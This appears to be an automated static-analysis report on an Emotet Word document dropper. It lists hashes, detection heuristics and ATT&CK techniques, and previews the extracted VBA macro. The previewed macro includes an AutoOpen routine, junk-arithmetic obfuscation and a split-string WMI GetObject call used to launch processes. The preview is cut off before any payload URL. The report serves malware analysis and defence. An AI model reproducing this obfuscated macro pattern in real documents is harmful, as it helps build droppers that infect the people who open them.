Emotet — Office (OLE) malware analysis

Static analysis result for SHA-256 f0f7cfb434c2a392…

MALICIOUS

Office (OLE)

146.0 KB Created: 2019-05-01 17:22:00 Authoring application: Microsoft Office Word First seen: 2019-11-20
MD5: 96cdf568dbc0321382662a802a070f84 SHA-1: c34034e98763cba603e04f391ce40fe60e4248a5 SHA-256: f0f7cfb434c2a3922d011186c1bfeeebf9cf5444b33cf90104ae09407bb65e06
342 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1218.011 System Binary Proxy Execution: Rundll32

The sample contains a VBA macro with an AutoOpen function, a common Emotet infection vector. Critical heuristics indicate the use of obfuscated API calls to launch processes via WMI, specifically reassembling the token 'winmgmts' to create a Win32_Process. This technique is used to download and execute a second-stage payload, as indicated by the ClamAV detection name 'Doc.Dropper.Emotet-6959731-0'.

Heuristics 9

  • ClamAV: Doc.Dropper.Emotet-6959731-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Emotet-6959731-0
  • VBA macros detected medium 5 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA WMI Win32_Process launcher critical OLE_VBA_WMI_PROCESS_CREATE
    VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
  • Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATION
    VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 20821 bytes
SHA-256: 0ec66599fe9e6142a4380a057e271016f0e9ef7b4fb974b0ed920e52d4f6b5ea
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "rBAXQAD"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "uAAoXAA"
Attribute VB_Base = "0{19096DCF-76A5-462A-8778-35A31E472F85}{F67B3265-E105-441A-AEF5-4F299B43ED7A}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "kQXAkAA"

Attribute VB_Name = "hwQ_GcA"

Attribute VB_Name = "fAAAGo"

Attribute VB_Name = "wDAAAC"

Attribute VB_Name = "SwQD4wA"

Attribute VB_Name = "hAoAkUAA"

Attribute VB_Name = "NoAQAA"

Attribute VB_Name = "UQQkAUA"
Attribute VB_Base = "0{7A8C2520-D85A-44BB-9E2B-BA822CEDE871}{71ED6B25-321F-42E2-BDDB-385EF688550D}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "CAQxxQXB"
Function jAAA1A(aAUAZU)
   Select Case YAkAAX
Case 607876225
Minute CInt(551927326 _
- Tan(uB1AAck * Cos(XBAUAw1) + _
326604505 + 492602580))
End Select
   Select Case YwAAAA4U
Case 497481336
Minute CInt(32682802 _
- Tan(kACA_QAA * Cos(vAooAD) + _
316861906 + 836624005))
End Select
   Select Case rZACUD_
Case 301219825
Minute CInt(526668550 _
- Tan(jAAA_A * Cos(QxGDDAD) + _
122285024 + 489764712))
End Select
Set jAAA1A = CVar(aAUAZU)
   Select Case dAZDAAC
Case 659984310
Minute CInt(902748411 _
- Tan(FQAQ1w1 * Cos(UAAccDZw) + _
982009707 + 725700183))
End Select
   Select Case uGAwQAB
Case 652829185
Minute CInt(921928753 _
- Tan(n1ABQDD * Cos(wACQkADD) + _
260866299 + 635342689))
End Select
   Select Case lU_4QkAB
Case 763528613
Minute CInt(515481722 _
- Tan(FAZ_QA4 * Cos(wQA_XZkw) + _
132327666 + 664152383))
End Select
End Function
Sub autoopen()
   Select Case zoxkUxA
Case 92928073
Minute CInt(586238285 _
- Tan(T_AABQA * Cos(sAoABAU) + _
18523351 + 559651681))
End Select
   Select Case Q1AAAA
Case 632490481
Minute CInt(550323800 _
- Tan(j4X_QA * Cos(HAx1_AAA) + _
211856689 + 664281942))
End Select
Call ucAA_UZX
   Select Case TUUAAB
Case 157315451
Minute CInt(691318453 _
- Tan(LxDAAU * Cos(jB_BBB) + _
939458184 + 5790805))
End Select
   Select Case tAAwUAB_
Case 766343198
Minute CInt(311378348 _
- Tan(kc1BADAQ * Cos(ZXAGwAA4) + _
29514864 + 626480221))
End Select
   Select Case UkDkAAk
Case 252080057
Minute CInt(260540041 _
- Tan(kcAk14 * Cos(QQkAox) + _
850966018 + 986085129))
End Select
End Sub


Attribute VB_Name = "a_D1AoBo"
Function ucAA_UZX()
On Error Resume Next
   Select Case zAGAAD
Case 993877399
Minute CInt(139821193 _
- Tan(kA_xQAA * Cos(b_QBkAA4) + _
653640184 + 255202773))
End Select
   Select Case w1AAQA
Case 180959178
Minute CInt(271576555 _
- Tan(L1AAUx * Cos(JAAXwA) + _
856179382 + 801334810))
End Select
   Select Case nAxAAk
Case 904283128
Minute CInt(374407405 _
- Tan(XC1AAAAZ * Cos(hwDQBA) + _
183660370 + 917968827))
End Select
Set iCUAB1C = jAAA1A(GetObject("w" + "inmgmts:W" + "in32_Process" + "Sta" + "rtup"))
   Select Case dCAAQC1A
Case 201384195
Minute CInt(521324913 _
- Tan(fAwAcA * Cos(bAQZXCDc) + _
214979997 + 347130263))
End Select
   Select Case AQxAxZ1
Case 765570612
Minute CInt(423957614 _
- Tan(wAAkCZ * Cos(FB1AcA) + _
106555726 + 443733542))
End Select
   Select Case lABUAA_
Case 342706215
Minute CInt(304829962 _
- Tan(FGQXDZ4U * Cos(IA_BQDQo) + _
989855003 + 534143441))
End Select
BkA1ABAX = vbError - vbError
   Select Case VDAGUk
Case 564807639
Minute CInt(457366789 _
- Tan(pAGxBQ * Cos(cACDAX) + _
689260177 + 866757292))
End Select
   Select Case iXAD1AA
Case 959099938
Minute CInt(292045512 _
- Tan(fcZXBZ * Cos(uQAAQAB) + _
413918322 + 933936691))

... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.